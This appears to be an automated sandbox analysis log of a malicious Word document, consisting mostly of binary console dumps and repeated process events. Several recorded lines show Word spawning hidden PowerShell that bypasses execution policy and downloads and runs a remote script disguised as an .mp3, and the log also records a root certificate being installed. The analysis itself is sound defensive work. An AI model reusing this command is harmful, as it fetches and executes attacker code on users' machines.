Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. ...............................................................................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....+..............................}..v....x,......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v....@3......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....3..............................}..v....x4......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....9......0.......................~.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....:..............................}..v.....;......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.3. .c.h.a.r.:.1.8...............}..v....(?......0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....?..............................}..v....`@......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v....(G......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....G..............................}..v....`H......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............O.u.t.F.i.l.e. .".e.n.d...v.b.s."...............}..v....pL......0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....(M..............................}..v.....M......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v....pT......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....(U..............................}..v.....U......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......Y......0...............h.T.....4.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....Z..............................}..v.....[......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v....P`......0.......................l.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....a..............................}..v.....a......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......#A.k......T.............................}..v.....e......0...............h.T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....e..............................}..v....Pf......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............#A.k......T.............................}..v....."......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................@.k....`#..............................}..v.....#......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............#A.k......T.............................}..v.....*......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................@.k....`+..............................}..v.....+......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............#A.k......T.............................}..v....H1......0.......................~.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................@.k.....2..............................}..v.....2......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.4. .c.h.a.r.:.1.8...............}..v.....6......0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................@.k....H7..............................}..v.....7......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............#A.k......T.............................}..v.....>......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......S.........................Y..... .......................}..v.....?...... .................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......u.t.F.i.l.e. .".h.s.t.a.r.t...v.b.s."...........}..v.....C......0...............h.T.....&.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................@.k.....D..............................}..v.....E......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............#A.k......T.............................}..v.....K......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................@.k.....L..............................}..v.....M......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....HQ......0...............h.T.....4.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................@.k.....R..............................}..v.....R......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....W......0.......................l.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....xX..............................}..v.....X......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......#A.k......T.............................}..v.....\......0...............h.T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....@]..............................}..v.....]......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v............0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....................................}..v....(.......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....!......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....."..............................}..v....(#......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....(......0.......................~.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....H)..............................}..v.....)......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.5. .c.h.a.r.:.1.8...............}..v.....-......0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....................................}..v...../......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....5......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....6..............................}..v.....7......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............u.t.F.i.l.e. .".s.t.a.r.t...c.m.d.".............}..v.... ;......0...............h.T.....$.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....;..............................}..v....X<......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.... C......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....C..............................}..v....XD......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......H......0...............h.T.....4.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k....@I..............................}..v.....I......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....O......0.......................l.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....O..............................}..v....8P......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......#A.k......T.............................}..v.....S......0...............h.T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....T..............................}..v.....U......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#o.k......T.............................}..v......!.....0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................n.k....................................}..v......!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.......n.n.o.t. .f.i.n.d. .t.h.e. .f.i.l.e. .s.p.e.c.i.f.i.e.d...!.....0...............h.T.....:.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................n.k......!.............................}..v....x.!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.......A.t. .l.i.n.e.:.7. .c.h.a.r.:.1.4...............}..v......!.....0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................n.k....@.!.............................}..v......!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............#o.k......T.............................}..v....(.!.....0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................n.k......!.............................}..v....`.!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............#o.k......T.............................}..v....(.!.....0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................n.k......!.............................}..v....`.!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....x.!.....0...............h.T.....&.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................n.k....0 !.............................}..v..... !.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............#o.k......T.............................}..v....x'!.....0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................n.k....0(!.............................}..v.....(!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o....... . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............h.T.....<.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................n.k.....-!.............................}..v....(.!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{....... .......#o.k......T.............................}..v.....1!.....0...............h.T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................n.k....p2!.............................}..v.....2!.....0.................T.............X...............Jump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')Jump to behavior
Source: RfORrHIRNe.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ORrHIRNe.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF7F4.tmpJump to behavior
Source: classification engineClassification label: mal92.expl.winDOC@3/10@3/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
Source: RfORrHIRNe.docOLE document summary: title field not present or empty
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DFB0DD1817E66C3CA2.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFB0DD1817E66C3CA2.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFB0DD1817E66C3CA2.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Suspicious powershell command line foundShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
